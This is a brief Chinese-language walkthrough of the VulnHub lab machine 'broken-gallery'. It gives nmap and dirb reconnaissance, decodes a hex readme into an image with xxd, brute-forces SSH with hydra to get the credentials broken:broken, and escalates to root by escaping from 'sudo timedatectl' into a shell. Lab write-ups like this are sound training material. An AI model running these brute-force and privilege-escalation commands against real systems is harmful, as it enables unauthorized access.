vulnhub系列:broken-gallery
一、信息收集
nmap扫描存活,根据mac地址寻找IP
nmap 192.168.23.0/24
nmap扫描端口:开放端口:22、80
nmap 192.168.23.186 -p- -A -sV -Pn
dirb扫描目录,没什么发现
dirb http://192.168.23.186/
访问80端口,可以看到有一些文件
readme.md 中是十六进制的值
将内容写入readme.md中,使用 xxd 转换
xxd -r -ps readme.md > readme.bin
查看文件,发现文件头为 JFIF ,是一张图片
将后缀修改为 jpg ,查看图片
一段留言,把上面的一些可能作为账号密码的字符拿下来,写个简单的字典,尝试爆破 ssh
Bob
BROKEN
avrahamcohen.ac
broken
二、getshell
使用 hydra 进行爆破
hydra -L users.txt -P pass.txt ssh://192.168.23.186
得到账号密码
broken:broken
ssh连接,连接成功
ssh broken@192.168.23.186
三、提权
查看当前权限
sudo -l
看到 timedatectl 可以执行root权限,执行命令,提权成功
sudo timedatectl list-timezones
!/bin/bash